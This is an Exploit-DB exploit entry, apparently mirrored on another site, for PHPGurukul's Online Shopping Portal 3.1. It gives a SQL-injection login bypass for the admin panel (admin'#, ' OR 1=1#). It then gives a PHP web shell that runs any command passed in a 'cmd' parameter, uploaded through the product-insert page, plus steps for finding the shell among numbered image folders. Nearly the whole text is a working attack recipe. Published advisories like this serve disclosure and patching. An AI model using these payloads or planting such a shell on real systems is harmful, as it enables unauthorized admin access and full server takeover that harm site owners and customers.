Online Shopping Portal 3.1 – Authentication Bypass - 体验盒子

作者： Ümit Yalçın

日期： 2020-07-01

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/48631/

# Exploit Title: Online Shopping Portal 3.1 - Authentication Bypass
# Date: 2020-06-25
# Exploit Author: Ümit Yalçın
# Vendor Homepage: https://phpgurukul.com/shopping-portal-free-download/
# Version: 3.1
# Tested on: Windows 10 / WampServer

1- Authentication Bypass

Go to following url!
http://localhost/shopping/admin/

Default admin username is admin, to bypass authentication use sql bypass like '# or ' OR 1=1#

username = admin'#
passwrod = what ever you want


2- Uploading Shell to Remote Code Execution

After bypassed the authentication go to insert-product field
http://localhost/shopping/admin/insert-product.php


after that, upload you shell , as an example

<?php
$exe = shell_exec($_REQUEST['cmd']);
echo $exe;
?>


and go to http://localhost/shopping/admin/productimages/ and all possible folders named with number from 1 like 

http://localhost/shopping/admin/productimages/1
http://localhost/shopping/admin/productimages/2
http://localhost/shopping/admin/productimages/3
http://localhost/shopping/admin/productimages/4
http://localhost/shopping/admin/productimages/5

When you find your shell, for example you found at 21

TARGET/shopping/admin/productimages/21/shell.php?cmd=CODE_YOU_WANT_TO_EXECUTE